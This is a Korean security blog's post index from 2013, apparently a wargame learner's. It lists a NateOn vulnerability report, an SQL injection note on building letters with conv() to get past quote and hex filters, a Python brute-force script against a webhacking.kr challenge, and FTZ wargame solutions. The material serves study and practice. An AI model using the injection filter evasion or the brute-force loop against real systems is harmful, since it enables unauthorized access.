본문 바로가기

전체 글171

2013년 네이트온 취약점 제보 친구인 이상섭,현성원군과 함께 하였습니다. 계산기실행 컴퓨터끄기 2013. 10. 1.
SQL injection Skill Note A~Z문자열을 쓸수없고 Hex(),0x를 사용하지못하는 상황에선 아래를 사용해볼 필요성이 있다.conv(10,10,36) -> Aconv(11,10,36) -> Bconv(12,10,36) -> Cconv(13,10,36) -> Dconv(14,10,36) -> Econv(15,10,36) -> Fconv(16,10,36) -> Gconv(17,10,36) -> Hconv(18,10,36) -> Iconv(19,10,36) -> Jconv(20,10,36) -> Kconv(21,10,36) -> Lconv(22,10,36) -> Mconv(23,10,36) -> Nconv(24,10,36) -> Oconv(25,10,36) -> Pconv(26,10,36) -> Qconv(27,10,36) -> Rcon.. 2013. 9. 15.
[Python] Http BruteForce 예제 import httplib import time headers = { 'Host':'webhacking.kr', 'Cookie':'PHPSESSID=사용자 쿠키값; notice=yes' } conn = httplib.HTTPConnection('webhacking.kr', 80) for i in range(2000, 3000): conn.request('GET', '/challenge/web/web-04/index.php?cid=admin&cpw=%s'%i,'', headers) #request argv[2] == body OK? r = conn.getresponse() res=r.read() # print res # time.sleep(1) if(not res.find('Wrong')+1): print.. 2013. 7. 31.
Hackerschool FTZ 풀이 FTZ level1 풀이FTZ level2 풀이FTZ level3 풀이FTZ level4 풀이FTZ level5 풀이FTZ level6 풀이FTZ level7 풀이FTZ level8 풀이FTZ level9 풀이FTZ level10 풀이FTZ level11풀이FTZ level12풀이FTZ level13풀이FTZ level14 풀이FTZ level15 풀이FTZ level16 풀이FTZ level17 풀이FTZ level18 풀이FTZ level19 풀이FTZ level20 풀이 쉘코드는 자유입니다..20번 풀이는 다른 문서를 보셔야 이해가능합니다. 2013. 7. 21.
반응형